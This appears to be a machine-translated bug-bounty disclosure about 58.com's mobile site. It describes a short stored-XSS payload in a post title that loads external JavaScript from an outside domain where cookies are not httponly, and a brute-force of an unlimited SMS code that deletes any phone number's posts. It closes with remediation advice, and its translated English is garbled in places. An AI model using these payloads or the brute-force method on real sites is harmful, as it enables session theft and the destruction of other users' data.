58 local storage-type XSS (loading JS with 25 characters) + posts with any mobile phone number deleted and repaired

58 local storage-type XSS (loading JS with 25 characters) + posts with any mobile phone number deleted and repaired

Without saying this, I spent all my energy on the primary domain. In addition, I would like to thank parsec for your thoughts and short domain names.

It's too late to dig for a vulnerability. If you don't have the energy to write details, just write it. Forget to forgive me! Look at this effort to dig holes. Don't go through the small vendor process!

Http://m.58.com/cs/cwzengsong/18047282901898x.shtml? Refrom = wap

The problem exists in the title of a post.
 

This is. The title of the web page on the pc side is also output in the meta content. However, due to the limit of 25 characters, the title cannot cause a more influential Vulnerability (it takes a long time to bypass )...

Later, I thought, isn't there still a m.58 mobile phone webpage? visit this post under the Mobile Phone domain name.

It is found that one of the three output headers is included in the script.

The test shows that the double quotation marks are not properly filtered to write code.

Figure:
 

The Code is as follows:

<Script> window. _ bd_assist_config = {"common": {"bdSnsKey" :{}, "bdText": "[renting a house, looking for a job, finding a service, going to the mobile phone 58 | m.58.com]" + alert (1) + "-Yuhua pet gift/adoption-Changsha 58 City", "bdMini": "2", "bdMiniList": false, "bdPic": "", "bdStyle ": "0", "bdSize": "32"}, "share" :{}}; with (document) 0 [(getElementsByTagName ('head ') [0] | body ). appendChild (createElement ('script ')). src = 'HTTP: // bdimg.developer.baidu.com/static/api/js/developer.js? V = 89860593.js? Cdnversion = '+ ~ (-New Date ()/36e5)]; </script>



Payload: "+ alert (1) +" takes 12 characters

I wanted to shut down the submitted results. Several friends in the parsec group started to talk about how to not load hooks or something.

(I gave up jquery after reading it a little. Later I found that jquery was renamed to jq, And then I immediately started fighting)



With the help of qaz. me, the short domain name of the pirate in Somalia is more confident.

So construct payload again to load js



Final payload: "+ loadJS (" // qaz. me ") +" (22 characters)



Finally, the external js is loaded successfully with a 22-character payload.

Cookie is not httponly



Previous figure:
 

The other is the deletion of any mobile phone number.
 

On this page, you can query the posts posted by the mobile phone number.


 

If you select one of them, the system will send a 6-digit verification code to the mobile phone without any time limit on the verification code. The number of verification codes submitted by the client is not limited.



One:
 

When the submitted payload is 793196, the returned value is true, and it is deleted!


 

 

 

Solution:

If xss is fixed, although you limit the length, some js class libraries you reference can be used as our helper. If you simply remove the "Number", filter it out. Some dangerous functions are also filtered out! There are so many ways to fix xss.



If you delete any post, set the validity period of the verification code. The number of verification codes submitted by the client must be limited.